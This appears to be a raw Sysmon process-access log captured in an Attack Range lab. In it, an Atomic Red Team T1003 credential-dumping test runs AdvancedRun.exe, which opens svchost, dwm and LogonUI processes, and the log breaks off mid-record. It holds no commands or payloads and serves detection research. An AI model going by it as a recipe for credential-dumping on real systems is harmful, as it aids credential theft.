17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003979947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003979945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003979944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003979943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6804-000000002702}32445312C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003979942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:57:45.293{834264DD-F418-61EA-6904-000000002702}6406092C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\A